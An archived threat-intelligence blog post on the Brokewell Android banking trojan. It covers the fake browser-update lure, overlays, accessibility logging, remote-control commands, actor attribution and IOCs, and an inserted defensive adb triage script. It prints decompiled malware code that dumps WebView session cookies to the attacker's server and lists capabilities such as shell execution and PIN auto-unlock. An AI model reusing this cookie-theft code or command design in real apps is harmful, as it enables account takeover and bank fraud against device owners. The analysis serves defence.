{
	"id": "95029ebf-9150-49e1-a758-303f6109e1b0",
	"created_at": "2026-04-06T00:10:56.814069Z",
	"updated_at": "2026-04-10T03:21:38.305589Z",
	"deleted_at": null,
	"sha1_hash": "6c3006c62eebf479b7b4d190698356ad153070ab",
	"title": "Brokewell: do not go broke from new banking malware!",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2065395,
	"plain_text": "Brokewell: do not go broke from new banking malware!\r\nPublished: 2024-10-01 · Archived: 2026-04-05 20:26:32 UTC\r\nIntroduction\r\nConstant monitoring of the threat landscape allows us to spot new threats and actors early and take immediate action—evaluating the threat and preparing for it.\r\nOur Threat Intelligence shows that device takeover capabilities remain crucial for any modern banking malware family, and new players entering the landscape are no exception. In most cases, remote access capabilities are built in from the start of the development cycle. Thus, it comes as no surprise that ThreatFabric analysts recently discovered a new mobile malware family, \"Brokewell,\" with an extensive set of Device Takeover capabilities.\r\nThe analysis of the samples revealed that Brokewell poses a significant threat to the banking industry, providing attackers with remote access to all assets available through mobile banking. The Trojan appears to be in active development, with new commands added almost daily.\r\nDuring our research, we discovered another dropper that bypasses Android 13+ restrictions. This dropper was developed by the same actor(s) and has been made publicly available, potentially impacting the threat landscape.\r\nIn this blog, we discuss Brokewell’s primary features that pose significant risks to financial institutions' customers and identify a new actor emerging in the mobile banking malware field.\r\nDiscovery - Browser Update?\r\nOur analysts discovered a fake browser update page designed to install an Android application. At first glance, there was nothing unusual—posing as a browser update is a common method used by cybercriminals to lure victims into downloading and installing malware. 
This approach seems innocent (with a carefully crafted page promoting an update for a newer version of the software) and natural (as it occurs during normal browser use) to unsuspecting victims.\r\nhttps://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware\r\nPage 1 of 13\n\nHowever, our analysis revealed that the downloaded application is a previously unseen malware family with a wide range of capabilities. Moreover, a retrospective analysis showed prior campaigns by this malware family targeting a popular \"buy now, pay later\" financial service and an Austrian digital authentication application.\r\nBrokewell - Well, Now You are Broke\r\nBrokewell is a typical modern banking malware, with both data-stealing and remote-control capabilities built in.\r\nStealing data: Monitoring Everything\r\nBrokewell uses overlay attacks, a common technique for Android banking malware, where it overlays a bogus screen on a targeted application to capture user credentials. Additionally, Brokewell can steal cookies, another feature common in modern mobile banking malware. It does this by launching its own WebView, overriding the WebViewClient onPageFinished callback, and loading the legitimate website inside that WebView. Once the victim completes the login process, Brokewell dumps the session cookies and sends them to the command and control (C2) server.\r\n// Decompiled WebViewClient callback; class and field names are as recovered by the decompiler\r\npublic final void onPageFinished(WebView webView0, String s) {\r\n    new Thread(new Runnable() {\r\n        @Override\r\n        public final void run() {\r\n            try {\r\n                JSONObject dataToSend = new JSONObject();\r\n                try {\r\n                    // C2 route for the cookie dump plus an identifier for this build\r\n                    dataToSend.put(\"routing\", \"/webv/dump-cookies\");\r\n                    dataToSend.put(\"apk_id\", com.brkwl.upstracking.WebvInject.f.this.a);\r\n                    // every cookie the WebView cookie store holds for the URL that just finished loading\r\n                    dataToSend.put(\"mycks\", CookieManager.getInstance().getCookie(s));\r\n                    dataToSend.put(\"myurl\", s);\r\n                }\r\n                catch (JSONException jSONException0) {\r\n                    jSONException0.printStackTrace();\r\n                }\r\n                // hand the JSON to AccSrvc, which encrypts it and sends it to the C2\r\n                AccSrvc.encryptAndSendData(dataToSend.toString());\r\n            }\r\n            catch (Exception exception0) {\r\n                exception0.printStackTrace();\r\n            }\r\n        }\r\n    }).start();\r\n}\r\nNote that CookieManager.getCookie reads the WebView's native cookie store, not document.cookie, so cookies marked HttpOnly are included in the dump: that flag only blocks access from page JavaScript and offers no protection here.\r\nMoreover, Brokewell is equipped with \"accessibility logging,\" capturing every event happening on the device: touches, swipes, information displayed, text input, and applications opened. All actions are logged and sent to the command-and-control server, effectively stealing any confidential data displayed or entered on the compromised device.\r\nIt's important to highlight that, in this case, any application is at risk of data compromise: Brokewell logs every event, posing a threat to all applications installed on the device.\r\nThis piece of malware also supports a variety of \"spyware\" functionalities: it can collect information about the device, call history, and geolocation, and record audio.\r\nDevice Takeover via Remote Control Capabilities\r\nAfter stealing the credentials, the actors can initiate a Device Takeover attack using remote control capabilities. 
To achieve this, the malware performs screen streaming and provides the actor with a range of actions that can be executed on the controlled device, such as touches, swipes, and clicks on specified elements.\r\nBelow is the set of commands available for remote control:\r\nCommand Description\r\ndoClickElem Performs a click on the specified element on the screen\r\ndoClickXY Performs a click at the specified coordinates on the screen\r\ndoDrawXY Draws a line between the specified coordinates\r\nDoGlobalActionBack Simulates “BACK” button click\r\nDoGlobalActionHome Simulates “HOME” button click\r\nDoGlobalActionRecents Simulates “RECENTS” button click\r\ndoScrollElem Performs a scroll in the specified element\r\ndoStartProjection Starts screen streaming\r\ndoStopProjection Stops screen streaming\r\nDoSwipeBottom Performs a swipe down\r\nDoSwipeLeft Performs a swipe left\r\nDoSwipeRight Performs a swipe right\r\nDoSwipeUp Performs a swipe up\r\ndoSwipeXY Performs a swipe between the specified coordinates\r\ndoTypingElem Inputs specified text in specified text field\r\ndoWakeScreen Wakes up the screen\r\nsimulateVIBRATE Simulates vibration\r\nzeroBRIGHTNESS Sets brightness to 0\r\nzeroVOLUME Sets volume to 0\r\nAs can be seen from the commands, the actors have full control over the infected device, allowing them to perform actions on the victim's behalf. zeroBRIGHTNESS and zeroVOLUME, combined with the fake \"Android is updating\" overlay listed in the Appendix (showOVLAY), let the operator work the device while it appears idle to the victim.\r\n
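The remote-control commands above, like the accessibility logging and the doScreenshot command in the Appendix, ride on the Android Accessibility Service, so the first thing an incident responder checks on a suspect device is which apps hold accessibility access. The script below is an added example (not code from the ThreatFabric write-up and not part of Brokewell) that parses the raw output of two adb commands offline and flags side-loaded apps with an enabled accessibility service, plus any match against the package names and SHA256 hashes from the Appendix IOC table. The adb outputs shown are constructed for the demo, the talkback allowlist is an assumption, and the service class name .AccSrvc is a guess taken from the decompiled helper name, not a confirmed component.

```python
# Added example, not ThreatFabric's or Brokewell's code: offline triage of an
# Android device against the Brokewell IOCs. Inputs are the text printed by
#   adb shell settings get secure enabled_accessibility_services
#   adb shell pm list packages -3
# (sample outputs below are constructed) plus optional sha256 digests of APKs
# pulled from the device, keyed by package name.
from __future__ import annotations

from dataclasses import dataclass

# Package names and SHA256 hashes as listed in the Appendix IOC table.
BROKEWELL_PACKAGES = {
    'jcwAz.EpLIq.vcAZiUGZpK': 'posing as Google Chrome',
    'zRFxj.ieubP.lWZzwlluca': 'posing as ID Austria',
}
BROKEWELL_SHA256 = {
    'd807070973bde0d85f260950dc764e46a0ba486f62da3e62f3b229ca3ea322f1',
    '00d35cf5af2431179b24002b3a4c7fb115380ebda496d78849bf3d10055d8a88',
}
# Assumed allowlist: accessibility services the device owner is expected to run.
KNOWN_GOOD_ACCESSIBILITY = {'com.google.android.marvin.talkback'}


@dataclass(frozen=True)
class Finding:
    package: str
    reason: str


def parse_enabled_services(setting: str) -> list[tuple[str, str]]:
    '''Split enabled_accessibility_services into (package, service) pairs.
    Android stores colon-separated flattened ComponentNames; an empty value
    prints as the literal word null.'''
    setting = setting.strip()
    if setting in ('', 'null'):
        return []
    pairs = []
    for entry in setting.split(':'):
        if not entry:
            continue
        pkg, _, svc = entry.partition('/')
        if svc.startswith('.'):  # short form pkg/.Svc expands to pkg.Svc
            svc = pkg + svc
        pairs.append((pkg, svc))
    return pairs


def parse_pm_list(output: str) -> set[str]:
    '''Collect package names from pm list packages output (lines of package:<name>).'''
    prefix = 'package:'
    return {line.strip()[len(prefix):] for line in output.splitlines()
            if line.strip().startswith(prefix)}


def triage(enabled_setting: str, pm_output: str,
           apk_sha256: dict[str, str] | None = None) -> list[Finding]:
    '''IOC hits first, then unrecognised third-party apps holding accessibility access.'''
    third_party = parse_pm_list(pm_output)
    ioc_hits, suspicious = [], []
    for pkg, svc in parse_enabled_services(enabled_setting):
        if pkg in BROKEWELL_PACKAGES:
            ioc_hits.append(Finding(pkg, f'Brokewell IOC package ({BROKEWELL_PACKAGES[pkg]}) has accessibility service {svc} enabled'))
        elif pkg in third_party and pkg not in KNOWN_GOOD_ACCESSIBILITY:
            suspicious.append(Finding(pkg, f'unrecognised third-party app has accessibility service {svc} enabled'))
    flagged = {f.package for f in ioc_hits}
    for pkg in sorted(third_party & set(BROKEWELL_PACKAGES)):
        if pkg not in flagged:  # installed but its service is not (yet) enabled
            ioc_hits.append(Finding(pkg, f'Brokewell IOC package installed ({BROKEWELL_PACKAGES[pkg]})'))
    for pkg, digest in sorted((apk_sha256 or {}).items()):
        if digest.lower() in BROKEWELL_SHA256:
            ioc_hits.append(Finding(pkg, 'APK SHA256 matches a Brokewell IOC'))
    return ioc_hits + suspicious


# Constructed sample output of the two adb commands. The IOC package name is from
# the Appendix; the .AccSrvc class name is a guess for the demo.
SAMPLE_ENABLED_SERVICES = (
    'com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService:'
    'jcwAz.EpLIq.vcAZiUGZpK/.AccSrvc'
)
SAMPLE_PM_LIST = '''package:com.google.android.marvin.talkback
package:jcwAz.EpLIq.vcAZiUGZpK
package:com.example.notes
'''
# Constructed: digest of the pulled APK, as sha256sum would print it (case-insensitive).
SAMPLE_APK_HASHES = {
    'jcwAz.EpLIq.vcAZiUGZpK': 'D807070973BDE0D85F260950DC764E46A0BA486F62DA3E62F3B229CA3EA322F1',
}


def demo() -> list[Finding]:
    return triage(SAMPLE_ENABLED_SERVICES, SAMPLE_PM_LIST, SAMPLE_APK_HASHES)


if __name__ == '__main__':
    for finding in demo():
        print(finding.package, '->', finding.reason)
```

On a live device, feed triage() the output of the two adb commands; to check hashes, locate the APK with adb shell pm path <package>, adb pull it, and hash it locally. An app that appears only in the third-party list but not in the accessibility setting is still worth a look, since the Appendix shows Brokewell can toggle its own service (doStopAcsSrvc) and hide its icon (doHideIcon).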
The remote-control capabilities might be further expanded in the future by automating specific actions to streamline the Device Takeover attack for the actors and potentially create a functional Automated Transfer System (ATS).\r\nThe full list of the commands supported by Brokewell is available in the Appendix.\r\nNew Actor in Mobile Malware Field\r\nAs part of our usual investigation, we sought additional threat intelligence to help identify the actor behind the threat. This often requires considerable effort and doesn't always yield results.\r\nHowever, some actors don't try to conceal their identity: one of the servers used as a command and control (C2) point for Brokewell was also used to host a repository called \"Brokewell Cyber Labs,\" created by \"Baron Samedit.\"\r\nThis repository contains the source code for the \"Brokewell Android Loader,\" another tool from the same developer designed to bypass Android 13+ restrictions on Accessibility Service for side-loaded applications. More details on these restrictions and other droppers discovered by ThreatFabric are available in one of our recent blogs.\r\nWe believe this will have a significant impact on the threat landscape. First, more actors will gain the capability to bypass Android 13+ restrictions, suggesting this could become a regular feature for most mobile malware families, similar to reading SMS messages.\r\nSecond, existing \"Dropper-as-a-Service\" offerings that currently provide this capability as a distinctive feature will likely either close their services or attempt to re-organize. This further lowers the entry barrier for cybercriminals looking to distribute mobile malware on modern devices, making it easier for more actors to enter the field.\r\nFurther analysis of the \"Baron Samedit\" profile reveals that they've been active for at least two years. Previously, the actor provided other cybercriminals with tools for checking stolen accounts from multiple services. With the introduction of the \"Brokewell Android Loader\" and its public availability, \"Baron Samedit\" has shifted to mobile malware, demonstrating the increasing interest of cybercriminals in this area.\r\nFinally, many cybercriminals are trying to \"professionalize\" their illegal activities by creating landing pages for their \"products,\" as seen in the case of the \"Hadoken Security Group\".\r\nBelow, you can see a screenshot of the landing page for \"Brokewell Cyber Labs,\" where the actor advertises their products, including mobile threats and other offerings.\r\nConclusion\r\nThe discovery of a new malware family, Brokewell, which implements Device Takeover capabilities from scratch, highlights the ongoing demand for such capabilities among cyber criminals. 
These actors require this functionality to commit fraud directly on victims' devices, creating a significant challenge for fraud detection tools that heavily rely on device identification or device fingerprinting.\r\nWe anticipate further evolution of this malware family, as we've already observed almost daily updates to the malware. Brokewell will likely be promoted on underground channels as a rental service, attracting the interest of other cybercriminals and sparking new campaigns targeting different regions.\r\nMalware families like Brokewell pose a significant risk for customers of financial institutions, leading to successful fraud cases that are hard to detect without proper fraud detection measures.\r\nWe believe that only a comprehensive, multi-layered fraud detection solution, based on a combination of indicators including device, behavior, and identity risks for each customer, can effectively identify and prevent potential fraud from malware families like the newly discovered Brokewell.\r\nStay vigilant, stay informed, and stay ahead with ThreatFabric.\r\nAppendix\r\nIOCs\r\nApp name | Package name | SHA256\r\nGοοgΙe Chrοme | jcwAz.EpLIq.vcAZiUGZpK | d807070973bde0d85f260950dc764e46a0ba486f62da3e62f3b229ca3ea322f1\r\nID Austria | zRFxj.ieubP.lWZzwlluca | 00d35cf5af2431179b24002b3a4c7fb115380ebda496d78849bf3d10055d8a88\r\nSupported Commands\r\nCommand Description\r\ndoClickElem Performs a click on the specified element on the screen\r\ndoClickXY Performs a click at the specified coordinates on the screen\r\ndoDrawXY Draws a line between the specified coordinates\r\nDoGlobalActionBack Simulates “BACK” button click\r\nDoGlobalActionHome Simulates “HOME” button click\r\nDoGlobalActionRecents Simulates “RECENTS” button click\r\ndoScrollElem Performs a scroll in the specified element\r\ndoStartProjection Starts screen streaming\r\ndoStopProjection Stops screen streaming\r\nDoSwipeBottom Performs a swipe down\r\nDoSwipeLeft Performs a swipe left\r\nDoSwipeRight Performs a swipe right\r\nDoSwipeUp Performs a swipe up\r\ndoSwipeXY Performs a swipe between the specified coordinates\r\ndoTypingElem Inputs specified text in specified text field\r\ndoWakeScreen Wakes up the screen\r\nsimulateVIBRATE Simulates vibration\r\nzeroBRIGHTNESS Sets brightness to 0\r\nzeroVOLUME Sets volume to 0\r\nAcsDumpCurrentNode Collects data from the current Accessibility node\r\nClearInjectList Clears the targets (injection) configuration\r\nDoGlobalActionDpadCenter Triggers the directional-pad center key event\r\nDoGlobalActionDpadDown Triggers the directional-pad down key event\r\nDoGlobalActionDpadLeft Triggers the directional-pad left key event\r\nDoGlobalActionDpadRight Triggers the directional-pad right key event\r\nDoGlobalActionDpadUp Triggers the directional-pad up key event\r\nDoGlobalActionLockScreen Locks the screen\r\nDoGlobalActionNotifications Opens notifications\r\nDoGlobalActionPWRdialog Opens power dialog\r\nDoGlobalActionSplitScreen Opens split screen\r\nDoGlobalActionTakeScreenshot Performs screenshot via global action\r\nDumpTelephonyInfo Collects information about SIM cards: phone number, operator name, number of SIM cards\r\naskLOCKPIN Opens fake screen requesting PIN code\r\naskPERMIT Requests necessary permissions\r\ncheckIPexit Retrieves IP address via external service\r\ncheckPERMIT Checks status of requested permissions\r\ndoActivateAdminPermit Requests activation of Device Admin\r\ndoCheckKeyguardState Checks status of keyguard\r\ndoCustomShowOVLAY Opens window with specified text\r\ndoDisabAggressiveReconnect Increases timeout before next connect\r\ndoEnabAggressiveReconnect Decreases timeout before next connect\r\ndoEnableUnknownSourceInstall Opens unknown app sources setting\r\ndoFlipANTI_UNINSTALL Changes self-defence setting to opposite (enables/disables)\r\ndoGetCallHistory Collects call history\r\ndoGetGeoloc Collects geolocation\r\ndoGetPKGINFO Gets details of the malicious package\r\ndoGetRAMconsumed Collects details about memory consumption\r\ndoHideFKLCRIcon Hides other components (currently empty)\r\ndoHideIcon Hides application icon\r\ndoINIT Collects extensive data about the device hardware\r\ndoInstallPKG Downloads and installs application\r\ndoOpenNotifSettings Opens app notification settings\r\ndoPINAutoUnlockScreen Automatically unlocks device with provided PIN\r\ndoPING Sends “PONGGGGxxxx” response\r\ndoPhoneCall Performs phone call\r\ndoRecordAudio Starts audio recording for specified duration\r\ndoScreenshot Takes screenshot with the help of Accessibility Service\r\ndoSelfDestroy Uninstalls malware\r\ndoSelfUpdateAPK Downloads and installs application with the same package name\r\ndoSendSMS Sends SMS message\r\ndoSetAggressiveACSMASK Sets malware to monitor all Accessibility events (“TYPE_ALL_MASK”)\r\ndoSetAssertiveACSMASK Sets malware to monitor only “TYPE_WINDOW_STATE_CHANGED” events\r\ndoStopAcsSrvc Disables Accessibility Service\r\ndoUnHideFKLCRIcon Enables other components (currently empty)\r\ndoUnHideIcon Enables icon of the application\r\ndoUninstallPKG Uninstalls specified package\r\ngetBattery Gets battery status\r\ngetInstalledPackages Collects installed applications\r\nopenCertainAPK Opens specified application\r\nopenDeveloperOptions Opens development settings if enabled\r\nopenWebvInject Opens WebView with specified URL\r\nrunSHELL Executes shell command\r\nsetC2addr Updates C2 server address\r\nsetInjectList Sets targets configuration\r\nshowNotif Shows notification\r\nshowOVLAY Shows window with text “Android is updating... Please dont turn off device.”\r\nSource: https://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware"
	],
	"report_names": [
		"brokewell-do-not-go-broke-by-new-banking-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434256,
	"ts_updated_at": 1775791298,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6c3006c62eebf479b7b4d190698356ad153070ab.pdf",
		"text": "https://archive.orkl.eu/6c3006c62eebf479b7b4d190698356ad153070ab.txt",
		"img": "https://archive.orkl.eu/6c3006c62eebf479b7b4d190698356ad153070ab.jpg"
	}
}